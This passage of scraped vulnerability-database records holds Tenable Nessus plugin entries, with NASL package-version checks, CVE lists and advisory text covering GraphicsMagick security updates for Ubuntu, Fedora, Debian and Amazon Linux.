pkgname:\"graphicsmagick\", pkgver:\"1.3.23-1ubuntu0.5\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libgraphicsmagick++-q16-12\", pkgver:\"1.3.23-1ubuntu0.5\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libgraphicsmagick-q16-3\", pkgver:\"1.3.23-1ubuntu0.5\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"graphicsmagick / libgraphicsmagick++-q16-12 / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-24T15:28:08", "description": "Latest stable release, includes many bug and security fixes.\n\nSee also http://www.graphicsmagick.org/NEWS.html#january-20-2017\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update 
system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-02-01T00:00:00", "type": "nessus", "title": "Fedora 27 : GraphicsMagick (2018-7c61d08c4f)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11102", "CVE-2017-11139", "CVE-2017-11140", "CVE-2017-11636", "CVE-2017-11637", "CVE-2017-11641", "CVE-2017-11643", "CVE-2017-13147", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-17782", "CVE-2017-17783", "CVE-2017-17912", "CVE-2017-17913", "CVE-2017-17915"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:GraphicsMagick", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2018-7C61D08C4F.NASL", "href": "https://www.tenable.com/plugins/nessus/106539", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-7c61d08c4f.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106539);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-11102\", \"CVE-2017-11139\", \"CVE-2017-11140\", \"CVE-2017-11636\", \"CVE-2017-11637\", \"CVE-2017-11641\", \"CVE-2017-11643\", \"CVE-2017-13147\", \"CVE-2017-16353\", \"CVE-2017-16669\", \"CVE-2017-17782\", \"CVE-2017-17783\", \"CVE-2017-17912\", \"CVE-2017-17913\", \"CVE-2017-17915\");\n script_xref(name:\"FEDORA\", value:\"2018-7c61d08c4f\");\n\n script_name(english:\"Fedora 27 : GraphicsMagick (2018-7c61d08c4f)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n 
attribute:\"description\", \n value:\n\"Latest stable release, includes many bug and security fixes.\n\nSee also http://www.graphicsmagick.org/NEWS.html#january-20-2017\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.graphicsmagick.org/NEWS.html#january-20-2017\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-7c61d08c4f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"GraphicsMagick-1.3.28-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-24T15:28:50", "description": "Latest stable release, includes many bug and security fixes.\n\nSee also http://www.graphicsmagick.org/NEWS.html#january-20-2017\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional 
issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-02-01T00:00:00", "type": "nessus", "title": "Fedora 26 : GraphicsMagick (2018-bfb9835edd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11102", "CVE-2017-11139", "CVE-2017-11140", "CVE-2017-11636", "CVE-2017-11637", "CVE-2017-11641", "CVE-2017-11643", "CVE-2017-13147", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-17782", "CVE-2017-17783", "CVE-2017-17912", "CVE-2017-17913", "CVE-2017-17915"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:GraphicsMagick", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2018-BFB9835EDD.NASL", "href": "https://www.tenable.com/plugins/nessus/106541", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-bfb9835edd.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106541);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-11102\", \"CVE-2017-11139\", \"CVE-2017-11140\", \"CVE-2017-11636\", \"CVE-2017-11637\", \"CVE-2017-11641\", \"CVE-2017-11643\", \"CVE-2017-13147\", \"CVE-2017-16353\", \"CVE-2017-16669\", \"CVE-2017-17782\", \"CVE-2017-17783\", \"CVE-2017-17912\", \"CVE-2017-17913\", \"CVE-2017-17915\");\n script_xref(name:\"FEDORA\", value:\"2018-bfb9835edd\");\n\n script_name(english:\"Fedora 26 : GraphicsMagick (2018-bfb9835edd)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Latest stable release, includes many bug and security fixes.\n\nSee also 
http://www.graphicsmagick.org/NEWS.html#january-20-2017\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.graphicsmagick.org/NEWS.html#january-20-2017\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-bfb9835edd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"GraphicsMagick-1.3.28-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:39:51", "description": "Various security issues were found and fixed in graphicsmagick in Debian wheezy LTS.\n\nCVE-2016-7446\n\nHeap buffer overflow issue in MVG/SVG rendering.\n\nCVE-2016-7447\n\nHeap overflow of the EscapeParenthesis() function\n\nCVE-2016-7449\n\nTIFF related problems due to use of strlcpy use.\n\nCVE-2016-7800\n\nFix unsigned underflow leading to heap overflow when parsing 
8BIM chunk.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 1.3.16-1.1+deb7u4.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-12T00:00:00", "type": "nessus", "title": "Debian DLA-651-1 : graphicsmagick security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7446", "CVE-2016-7447", "CVE-2016-7449", "CVE-2016-7800"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:graphicsmagick", "p-cpe:/a:debian:debian_linux:graphicsmagick-dbg", "p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat", "p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat", "p-cpe:/a:debian:debian_linux:libgraphics-magick-perl", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b3", "p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick3", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-651.NASL", "href": "https://www.tenable.com/plugins/nessus/93968", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-651-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93968);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-7446\", \"CVE-2016-7447\", \"CVE-2016-7449\", \"CVE-2016-7800\");\n\n script_name(english:\"Debian DLA-651-1 : graphicsmagick security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Various security issues were found and fixed in graphicsmagick in\nDebian wheezy LTS.\n\nCVE-2016-7446\n\nHeap buffer overflow issue in MVG/SVG rendering.\n\nCVE-2016-7447\n\nHeap overflow of the EscapeParenthesis() function\n\nCVE-2016-7449\n\nTIFF related problems due to use of strlcpy use.\n\nCVE-2016-7800\n\nFix unsigned underflow leading to heap overflow when parsing 8BIM\nchunk.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.3.16-1.1+deb7u4.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/10/msg00007.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/graphicsmagick\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphics-magick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick3\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick\", reference:\"1.3.16-1.1+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-dbg\", reference:\"1.3.16-1.1+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-imagemagick-compat\", reference:\"1.3.16-1.1+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-libmagick-dev-compat\", reference:\"1.3.16-1.1+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphics-magick-perl\", reference:\"1.3.16-1.1+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick++1-dev\", reference:\"1.3.16-1.1+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick++3\", reference:\"1.3.16-1.1+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick1-dev\", reference:\"1.3.16-1.1+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick3\", reference:\"1.3.16-1.1+deb7u4\")) flag++;\n\nif 
(flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-24T15:31:12", "description": "Memory information disclosure in DescribeImage function in magick/describe.c\n\nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in the DescribeImage function of the magick/describe.c file, because of a heap-based buffer over-read. The portion of the code containing the vulnerability is responsible for printing the IPTC Profile information contained in the image. This vulnerability can be triggered with a specially crafted MIFF file.\nThere is an out-of-bounds buffer dereference because certain increments are never checked. (CVE-2017-16353 )\n\nGraphicsMagick 1.3.26 has double free vulnerabilities in the ReadOneJNGImage() function in coders/png.c (CVE-2017-11139)\n\nIn GraphicsMagick there is a stack-based buffer over-read in WriteWEBPImage in coders/webp.c, related to an incompatibility with libwebp versions, 0.5.0 and later, that use a different structure type. (CVE-2017-17913)\n\nIn GraphicsMagick 1.3.27, there is an infinite loop and application hang in the ReadBMPImage function (coders/bmp.c). Remote attackers could leverage this vulnerability to cause a denial of service via an image file with a crafted bit-field mask value. (CVE-2018-5685)\n\nThe ReadJPEGImage function in coders/jpeg.c in GraphicsMagick 1.3.26 creates a pixel cache before a successful read of a scanline, which allows remote attackers to cause a denial of service (resource consumption) via crafted JPEG files. (CVE-2017-11140)\n\nIn GraphicsMagick 1.3.26, an allocation failure vulnerability was found in the function ReadMNGImage in coders/png.c when a small MNG file has a MEND chunk with a large length value. 
(CVE-2017-13147)\n\nGraphicsMagick 1.3.26 has a heap overflow in the WriteCMYKImage() function in coders/cmyk.c when processing multiple frames that have non-identical widths. (CVE-2017-11643)\n\nGraphicsMagick 1.3.26 has a Memory Leak in the PersistCache function in magick/pixel_cache.c during writing of Magick Persistent Cache (MPC) files. (CVE-2017-11641)\n\nIn GraphicsMagick there is a heap-based buffer over-read in ReadMNGImage in coders/png.c, related to accessing one byte before testing whether a limit has been reached. (CVE-2017-17915)\n\nIn GraphicsMagick 1.3.27a, there is a buffer over-read in ReadPALMImage in coders/palm.c when QuantumDepth is 8.\n(CVE-2017-17783)\n\nIn GraphicsMagick 1.3.27a, there is a heap-based buffer over-read in ReadOneJNGImage in coders/png.c, related to oFFs chunk allocation.\n(CVE-2017-17782)\n\ncoders/wpg.c in GraphicsMagick 1.3.26 allows remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted file, related to the AcquireCacheNexus function in magick/pixel_cache.c.\n(CVE-2017-16669)\n\nIn GraphicsMagick there is a heap-based buffer over-read in ReadNewsProfile in coders/tiff.c, in which LocaleNCompare reads heap data beyond the allocated region. (CVE-2017-17912)\n\nThe ReadOneJNGImage function in coders/png.c in GraphicsMagick 1.3.26 allows remote attackers to cause a denial of service (application crash) during JNG reading via a zero-length color_image data structure. (CVE-2017-11102)\n\nGraphicsMagick 1.3.26 has a NULL pointer dereference in the WritePCLImage() function in coders/pcl.c during writes of monochrome images. (CVE-2017-11637)\n\nGraphicsMagick 1.3.26 has a heap overflow in the WriteRGBImage() function in coders/rgb.c when processing multiple frames that have non-identical widths. 
(CVE-2017-11636)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-09T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : GraphicsMagick (ALAS-2018-966)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11102", "CVE-2017-11139", "CVE-2017-11140", "CVE-2017-11636", "CVE-2017-11637", "CVE-2017-11641", "CVE-2017-11643", "CVE-2017-13147", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-17782", "CVE-2017-17783", "CVE-2017-17912", "CVE-2017-17913", "CVE-2017-17915", "CVE-2018-5685"], "modified": "2019-07-10T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:GraphicsMagick", "p-cpe:/a:amazon:linux:graphicsmagick-c%2b%2b", "p-cpe:/a:amazon:linux:graphicsmagick-c%2b%2b-devel", "p-cpe:/a:amazon:linux:GraphicsMagick-debuginfo", "p-cpe:/a:amazon:linux:GraphicsMagick-devel", "p-cpe:/a:amazon:linux:GraphicsMagick-doc", "p-cpe:/a:amazon:linux:GraphicsMagick-perl", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2018-966.NASL", "href": "https://www.tenable.com/plugins/nessus/107237", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2018-966.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107237);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/07/10 16:04:12\");\n\n script_cve_id(\"CVE-2017-11102\", \"CVE-2017-11139\", \"CVE-2017-11140\", \"CVE-2017-11636\", \"CVE-2017-11637\", \"CVE-2017-11641\", \"CVE-2017-11643\", \"CVE-2017-13147\", \"CVE-2017-16353\", \"CVE-2017-16669\", \"CVE-2017-17782\", \"CVE-2017-17783\", \"CVE-2017-17912\", \"CVE-2017-17913\", \"CVE-2017-17915\", \"CVE-2018-5685\");\n script_xref(name:\"ALAS\", value:\"2018-966\");\n\n script_name(english:\"Amazon Linux AMI : GraphicsMagick (ALAS-2018-966)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote 
Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Memory information disclosure in DescribeImage function in\nmagick/describe.c\n\nGraphicsMagick is vulnerable to a memory information disclosure\nvulnerability found in the DescribeImage function of the\nmagick/describe.c file, because of a heap-based buffer over-read. The\nportion of the code containing the vulnerability is responsible for\nprinting the IPTC Profile information contained in the image. This\nvulnerability can be triggered with a specially crafted MIFF file.\nThere is an out-of-bounds buffer dereference because certain\nincrements are never checked. (CVE-2017-16353 )\n\nGraphicsMagick 1.3.26 has double free vulnerabilities in the\nReadOneJNGImage() function in coders/png.c (CVE-2017-11139)\n\nIn GraphicsMagick there is a stack-based buffer over-read in\nWriteWEBPImage in coders/webp.c, related to an incompatibility with\nlibwebp versions, 0.5.0 and later, that use a different structure\ntype. (CVE-2017-17913)\n\nIn GraphicsMagick 1.3.27, there is an infinite loop and application\nhang in the ReadBMPImage function (coders/bmp.c). Remote attackers\ncould leverage this vulnerability to cause a denial of service via an\nimage file with a crafted bit-field mask value. (CVE-2018-5685)\n\nThe ReadJPEGImage function in coders/jpeg.c in GraphicsMagick 1.3.26\ncreates a pixel cache before a successful read of a scanline, which\nallows remote attackers to cause a denial of service (resource\nconsumption) via crafted JPEG files. (CVE-2017-11140)\n\nIn GraphicsMagick 1.3.26, an allocation failure vulnerability was\nfound in the function ReadMNGImage in coders/png.c when a small MNG\nfile has a MEND chunk with a large length value. (CVE-2017-13147)\n\nGraphicsMagick 1.3.26 has a heap overflow in the WriteCMYKImage()\nfunction in coders/cmyk.c when processing multiple frames that have\nnon-identical widths. 
(CVE-2017-11643)\n\nGraphicsMagick 1.3.26 has a Memory Leak in the PersistCache function\nin magick/pixel_cache.c during writing of Magick Persistent Cache\n(MPC) files. (CVE-2017-11641)\n\nIn GraphicsMagick there is a heap-based buffer over-read in\nReadMNGImage in coders/png.c, related to accessing one byte before\ntesting whether a limit has been reached. (CVE-2017-17915)\n\nIn GraphicsMagick 1.3.27a, there is a buffer over-read in\nReadPALMImage in coders/palm.c when QuantumDepth is 8.\n(CVE-2017-17783)\n\nIn GraphicsMagick 1.3.27a, there is a heap-based buffer over-read in\nReadOneJNGImage in coders/png.c, related to oFFs chunk allocation.\n(CVE-2017-17782)\n\ncoders/wpg.c in GraphicsMagick 1.3.26 allows remote attackers to cause\na denial of service (heap-based buffer overflow and application crash)\nor possibly have unspecified other impact via a crafted file, related\nto the AcquireCacheNexus function in magick/pixel_cache.c.\n(CVE-2017-16669)\n\nIn GraphicsMagick there is a heap-based buffer over-read in\nReadNewsProfile in coders/tiff.c, in which LocaleNCompare reads heap\ndata beyond the allocated region. (CVE-2017-17912)\n\nThe ReadOneJNGImage function in coders/png.c in GraphicsMagick 1.3.26\nallows remote attackers to cause a denial of service (application\ncrash) during JNG reading via a zero-length color_image data\nstructure. (CVE-2017-11102)\n\nGraphicsMagick 1.3.26 has a NULL pointer dereference in the\nWritePCLImage() function in coders/pcl.c during writes of monochrome\nimages. (CVE-2017-11637)\n\nGraphicsMagick 1.3.26 has a heap overflow in the WriteRGBImage()\nfunction in coders/rgb.c when processing multiple frames that have\nnon-identical widths. 
